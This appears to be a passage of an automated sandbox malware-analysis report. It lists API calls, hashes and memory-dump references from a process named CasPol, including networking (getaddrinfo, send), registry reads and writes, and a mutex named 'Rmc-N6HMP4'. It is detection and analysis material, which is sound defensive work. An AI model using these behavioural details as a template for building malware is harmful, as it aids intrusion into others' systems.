                                                                                                                                                                          • Instruction ID: a18c2cf71696728a803f4d48a8d0c2278a59ecc2ec6ff56e3a85b819d46b2ac8
                                                                                                                                                                          • Opcode Fuzzy Hash: 943d233b4da6a66401ce6f93dd42c62b0fddc350c13312a5139ff755dbddca0b
                                                                                                                                                                          • Instruction Fuzzy Hash: 4F51B6315082019AC724FB32D852AFF73A5AF94304F50483FF546671E2EF3C5945C68A
                                                                                                                                                                          APIs
                                                                                                                                                                          • getaddrinfo.WS2_32(00000000,00000000,00000000,00472AF0,h}v,00000000,004151C3,00000000,00000001), ref: 00414F46
                                                                                                                                                                          • WSASetLastError.WS2_32(00000000), ref: 00414F4B
                                                                                                                                                                            • Part of subcall function 00414DC1: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414E10
                                                                                                                                                                            • Part of subcall function 00414DC1: LoadLibraryA.KERNEL32(?), ref: 00414E52
                                                                                                                                                                            • Part of subcall function 00414DC1: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E72
                                                                                                                                                                            • Part of subcall function 00414DC1: FreeLibrary.KERNEL32(00000000), ref: 00414E79
                                                                                                                                                                            • Part of subcall function 00414DC1: LoadLibraryA.KERNEL32(?), ref: 00414EB1
                                                                                                                                                                            • Part of subcall function 00414DC1: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414EC3
                                                                                                                                                                            • Part of subcall function 00414DC1: FreeLibrary.KERNEL32(00000000), ref: 00414ECA
                                                                                                                                                                            • Part of subcall function 00414DC1: GetProcAddress.KERNEL32(00000000,?), ref: 00414ED9
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                                                                                                                                                                          • String ID: h}v
                                                                                                                                                                          • API String ID: 1170566393-2591199288
                                                                                                                                                                          • Opcode ID: 930efd5b04e65bc9372c1b57b3a52d6002a1f5a2d46d5e1141b82df15956c107
                                                                                                                                                                          • Instruction ID: b2b0aefd8e35b341f4c894e58f46b645776b5e98a3349e02c71c7f637998c076
                                                                                                                                                                          • Opcode Fuzzy Hash: 930efd5b04e65bc9372c1b57b3a52d6002a1f5a2d46d5e1141b82df15956c107
                                                                                                                                                                          • Instruction Fuzzy Hash: 9DD05B322005316BD310576D6C00FFB569EDFD7760B110037F404D3251DA949C8247AC
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateMutexA.KERNEL32(00000000,00000001,00000000,0040EC43,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660CC,00000003,00000000), ref: 0040D0B3
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0040D0BE
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateErrorLastMutex
                                                                                                                                                                          • String ID: Rmc-N6HMP4
                                                                                                                                                                          • API String ID: 1925916568-2778154606
                                                                                                                                                                          • Opcode ID: bc77eaf552dd10d8f01c03cd32d716e6d6dac4663c01f768c58145daaeb2b4d9
                                                                                                                                                                          • Instruction ID: 897831e38bae895769414ba5eaefcaa992d87aaaa8244aa01aad5f1db7de32a1
                                                                                                                                                                          • Opcode Fuzzy Hash: bc77eaf552dd10d8f01c03cd32d716e6d6dac4663c01f768c58145daaeb2b4d9
                                                                                                                                                                          • Instruction Fuzzy Hash: 62D012B0614301EBDB0467709C5975936559B44702F50487AB50BD95F1CBFC88D08519
                                                                                                                                                                          APIs
                                                                                                                                                                          • send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474F08,?), ref: 00404B47
                                                                                                                                                                          • SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474F08,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: EventObjectSingleWaitsend
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3963590051-0
                                                                                                                                                                          • Opcode ID: b1d66744df5c6cb587348be29f4f2b73cfa97db57556f8ad38e66ecf600c3840
                                                                                                                                                                          • Instruction ID: ade4869c8039bafc3f5202e75afdfb18787be874a76dce876c460fae4797ad88
                                                                                                                                                                          • Opcode Fuzzy Hash: b1d66744df5c6cb587348be29f4f2b73cfa97db57556f8ad38e66ecf600c3840
                                                                                                                                                                          • Instruction Fuzzy Hash: 152124B2900119BBCB04ABA1DC95DEEB77CFF14314B00452FF515B71E2EB38AA15C6A4
                                                                                                                                                                          APIs
                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                                                                                                                                          • RegQueryValueExA.KERNEL32 ref: 00413622
                                                                                                                                                                          • RegCloseKey.KERNEL32(?), ref: 0041362D
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3677997916-0
                                                                                                                                                                          • Opcode ID: 6d7bb055a41a46af3afbf88891c67b332a8db22587d044117d184b09d82707ea
                                                                                                                                                                          • Instruction ID: 0661f39b514c0023b6096d8878825bbc81d19e8e8981dfb5b132c5fecbfe39b6
                                                                                                                                                                          • Opcode Fuzzy Hash: 6d7bb055a41a46af3afbf88891c67b332a8db22587d044117d184b09d82707ea
                                                                                                                                                                          • Instruction Fuzzy Hash: 4A01D676900228FBCB209B91DC08DEF7F7DDB44B51F004066BB05A2240DA748E45DBA4
                                                                                                                                                                          APIs
                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 0041374F
                                                                                                                                                                          • RegQueryValueExA.KERNEL32 ref: 00413768
                                                                                                                                                                          • RegCloseKey.KERNEL32(00000000), ref: 00413773
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3677997916-0
                                                                                                                                                                          • Opcode ID: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                                                                                                                                                                          • Instruction ID: cdc8bb2f12cdea1da97e3e4d454c68039a4c25ad8704162e95ac064a0ac82555
                                                                                                                                                                          • Opcode Fuzzy Hash: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                                                                                                                                                                          • Instruction Fuzzy Hash: C301AD7540022DFBDF215F91DC04DEB3F38EF05761F008065BE09620A1E7358AA5EB94
                                                                                                                                                                          APIs
                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004135A4
                                                                                                                                                                          • RegQueryValueExA.KERNEL32 ref: 004135C2
                                                                                                                                                                          • RegCloseKey.KERNEL32(?), ref: 004135CD
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3677997916-0
                                                                                                                                                                          • Opcode ID: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                                                                                                                                                          • Instruction ID: 3ea041f737baa467864e73cd7e114674dd940ed34319bd14b5ec79364d8ab256
                                                                                                                                                                          • Opcode Fuzzy Hash: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                                                                                                                                                          • Instruction Fuzzy Hash: 39F01D76900218FFDF109FA09C45FEE7BBDEB04B11F1044A5BA04E6191D6359F549B94
                                                                                                                                                                          APIs
                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413551
                                                                                                                                                                          • RegQueryValueExA.KERNEL32 ref: 00413565
                                                                                                                                                                          • RegCloseKey.KERNEL32(?), ref: 00413570
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3677997916-0
                                                                                                                                                                          • Opcode ID: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                                                                                                                                                          • Instruction ID: 960a54a16a1ccd4152458ec6927d20d37e2092670a33f2d7c306b576a706ad25
                                                                                                                                                                          • Opcode Fuzzy Hash: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                                                                                                                                                          • Instruction Fuzzy Hash: 23E06532801238FBDF204FA29C0DDEB7F6CDF06BA1B000155BD0CA1111D2258E50E6E4
                                                                                                                                                                          APIs
                                                                                                                                                                          • RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                                                                                                                                          • RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004), ref: 004138DB
                                                                                                                                                                          • RegCloseKey.KERNEL32(004660B4), ref: 004138E6
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseCreateValue
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1818849710-0
                                                                                                                                                                          • Opcode ID: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                                                                                                                                                          • Instruction ID: 04d77b696783773a8a307df6842786532c8303179302b097fa31242bc3118ae5
                                                                                                                                                                          • Opcode Fuzzy Hash: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                                                                                                                                                          • Instruction Fuzzy Hash: 1EE06D72500318FBDF109FA0DC06FEA7BACEF04B62F104565BF09A6191D6358E14E7A8
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0044EE69
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Info
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1807457897-3916222277
                                                                                                                                                                          • Opcode ID: c218bb7fec2994ea758599c37fad7e7d2b1b4cc9144a8923480740bb4dc68c2e
                                                                                                                                                                          • Instruction ID: 2d4132b881e94a0a9fd0de77a922cbe9b4a8b8c61ff6a95216f325efaac8b060
                                                                                                                                                                          • Opcode Fuzzy Hash: c218bb7fec2994ea758599c37fad7e7d2b1b4cc9144a8923480740bb4dc68c2e
                                                                                                                                                                          • Instruction Fuzzy Hash: 7E411070504748AFEF218E25CC84AF7BBB9FF45304F2404EEE59987142D2399A46DF65
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 10006AF0
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.697379878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.697370676.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.697379878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_10000000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Info
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1807457897-3916222277
                                                                                                                                                                          • Opcode ID: 6cedc9456a51a48c8b79c853d380540c5183232597a17884e183f7c8afc1900e
                                                                                                                                                                          • Instruction ID: 7792c4a5177154c3e9ca344f7bd1be717728489360a1cc3eced530dab922c6d1
                                                                                                                                                                          • Opcode Fuzzy Hash: 6cedc9456a51a48c8b79c853d380540c5183232597a17884e183f7c8afc1900e
                                                                                                                                                                          • Instruction Fuzzy Hash: D241FCB050429C9AFB21CF148C84BEABBEAEB49344F2444EDE5C9C6146D735AA85DF20
                                                                                                                                                                          APIs
                                                                                                                                                                          • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000001,?,?), ref: 00448CA4
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: String
                                                                                                                                                                          • String ID: LCMapStringEx
                                                                                                                                                                          • API String ID: 2568140703-3893581201
                                                                                                                                                                          • Opcode ID: 4e10c201ebb2099c74eb4779768ff64867bf24b434018514e16e99dc8bd4ef65
                                                                                                                                                                          • Instruction ID: c3f282dcf0fd97a5c368a601407465e3bede0a00add2935535d0592c00eac712
                                                                                                                                                                          • Opcode Fuzzy Hash: 4e10c201ebb2099c74eb4779768ff64867bf24b434018514e16e99dc8bd4ef65
                                                                                                                                                                          • Instruction Fuzzy Hash: 3001253254120CFBCF02AF91DD02EEE7F66EF08751F04416AFE1965161CA3A8971EB99
                                                                                                                                                                          APIs
                                                                                                                                                                          • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,5EFC4D8B,00000100,?,5EFC4D8B,00000000), ref: 10005F8A
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.697379878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.697370676.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.697379878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_10000000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: String
                                                                                                                                                                          • String ID: LCMapStringEx
                                                                                                                                                                          • API String ID: 2568140703-3893581201
                                                                                                                                                                          • Opcode ID: 9311d150e09a2ea236c127db5a9a9399c35e1f3cdcd5bb094b510bbe54d2b48d
                                                                                                                                                                          • Instruction ID: 984c2aabb43d86beb2eff1d34daabde68608d0bd8f0a2971fe4c3ea005c0c61c
                                                                                                                                                                          • Opcode Fuzzy Hash: 9311d150e09a2ea236c127db5a9a9399c35e1f3cdcd5bb094b510bbe54d2b48d
                                                                                                                                                                          • Instruction Fuzzy Hash: 9401D332500159BBEF129F90CC05EEE7F66EF08390F018115FE1826124CB369971AB95
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Alloc
                                                                                                                                                                          • String ID: FlsAlloc
                                                                                                                                                                          • API String ID: 2773662609-671089009
                                                                                                                                                                          • Opcode ID: 8d34d378e792ffc8bee28f5c2a12e2aa67d49de27489c3fe41b8e68b567a8336
                                                                                                                                                                          • Instruction ID: f8901b274c9ac7999680b04b2037e580393277d5e39e0d99f0e7f02c98ef4e36
                                                                                                                                                                          • Opcode Fuzzy Hash: 8d34d378e792ffc8bee28f5c2a12e2aa67d49de27489c3fe41b8e68b567a8336
                                                                                                                                                                          • Instruction Fuzzy Hash: 8FE05530640318F7D3016B21DC16A2FBB94DB04B22B10006FFD0553241EE794D15C5CE
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.697379878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.697370676.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.697379878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_10000000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Alloc
                                                                                                                                                                          • String ID: FlsAlloc
                                                                                                                                                                          • API String ID: 2773662609-671089009
                                                                                                                                                                          • Opcode ID: 5ade6ed448300679f83b5d20ac83fd3ad7347746afaf7e54a560ff76d56e46a0
                                                                                                                                                                          • Instruction ID: c304bc83fd0672a576945d725d7c66755e55876121cef6cfa1c70df20931aaa1
                                                                                                                                                                          • Opcode Fuzzy Hash: 5ade6ed448300679f83b5d20ac83fd3ad7347746afaf7e54a560ff76d56e46a0
                                                                                                                                                                          • Instruction Fuzzy Hash: 43E0E535600228ABF325EB608C15EEFBBA4DB583D1B01405AFE0966209CE326D0185D6
                                                                                                                                                                          APIs
                                                                                                                                                                          • try_get_function.LIBVCRUNTIME ref: 00438E29
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: try_get_function
                                                                                                                                                                          • String ID: FlsAlloc
                                                                                                                                                                          • API String ID: 2742660187-671089009
                                                                                                                                                                          • Opcode ID: 1eb4f256e7c4e0b4dee7f2b7c001ffdd8c026b266bbfd6c5aa47d90a079f9e5b
                                                                                                                                                                          • Instruction ID: b64d3ab94c56a33c1928a034b10f94234fe941941be7f39555266fb58f36a209
                                                                                                                                                                          • Opcode Fuzzy Hash: 1eb4f256e7c4e0b4dee7f2b7c001ffdd8c026b266bbfd6c5aa47d90a079f9e5b
                                                                                                                                                                          • Instruction Fuzzy Hash: 09D02B31BC1328B6C51032955C03BD9B6048B00FF7F002067FF0C61283899E592082DE
                                                                                                                                                                          APIs
                                                                                                                                                                          • try_get_function.LIBVCRUNTIME ref: 10003B06
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.697379878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.697370676.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.697379878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_10000000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: try_get_function
                                                                                                                                                                          • String ID: FlsAlloc
                                                                                                                                                                          • API String ID: 2742660187-671089009
                                                                                                                                                                          • Opcode ID: e5392f9aa55551a50589cb99c6148b67437594651e03cd2756b54b563a9e1daf
                                                                                                                                                                          • Instruction ID: 0b7c7f44018c04906f4f2ef9afae3f4f684564eee465a9a4c05fe82f6616737e
                                                                                                                                                                          • Opcode Fuzzy Hash: e5392f9aa55551a50589cb99c6148b67437594651e03cd2756b54b563a9e1daf
                                                                                                                                                                          • Instruction Fuzzy Hash: 13D02B32744138B3F201B3A06C04BEEBB88D7025F2F040063FB4C5210CDB11591042E6
                                                                                                                                                                          APIs
                                                                                                                                                                          • GlobalMemoryStatusEx.KERNEL32(?), ref: 0041B85B
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: GlobalMemoryStatus
                                                                                                                                                                          • String ID: @
                                                                                                                                                                          • API String ID: 1890195054-2766056989
                                                                                                                                                                          • Opcode ID: 23b0e77897189e0b78fa4d1d520ef24eb5f5038ce1868e817330353f58216111
                                                                                                                                                                          • Instruction ID: 3eac6c9810fdf3f5cdd4c6aee73cb3509883e52e26c84b2cc96e0464d85798e3
                                                                                                                                                                          • Opcode Fuzzy Hash: 23b0e77897189e0b78fa4d1d520ef24eb5f5038ce1868e817330353f58216111
                                                                                                                                                                          • Instruction Fuzzy Hash: F6D017B58023189FC720DFA8E804A8DBBFCEB08210F00456AEC49E3300E770EC008B84
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0044ED6C: GetOEMCP.KERNEL32(00000000,?,?,0044EFF5,?), ref: 0044ED97
                                                                                                                                                                          • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0044F03A,?,00000000), ref: 0044F20D
                                                                                                                                                                          • GetCPInfo.KERNEL32(00000000,0044F03A,?,?,?,0044F03A,?,00000000), ref: 0044F220
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CodeInfoPageValid
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 546120528-0
                                                                                                                                                                          • Opcode ID: 747d95ecf2005c527016839393fb107aa8d78a19bbf0a74999b8906be39dfc0a
                                                                                                                                                                          • Instruction ID: 491245c4813b68437391e3e70942b885a5b84425ef1b1be509cf98dd56c33fdc
                                                                                                                                                                          • Opcode Fuzzy Hash: 747d95ecf2005c527016839393fb107aa8d78a19bbf0a74999b8906be39dfc0a
                                                                                                                                                                          • Instruction Fuzzy Hash: A05153749002469EFB208F76C8816BBBBE4FF01304F1480BFD48687251E67E994A8B99
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 100069F3: GetOEMCP.KERNEL32(00000000,?,?,10006C7C,?), ref: 10006A1E
                                                                                                                                                                          • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,10006CC1,?,00000000), ref: 10006E94
                                                                                                                                                                          • GetCPInfo.KERNEL32(00000000,10006CC1,?,?,?,10006CC1,?,00000000), ref: 10006EA7
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.697379878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.697370676.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
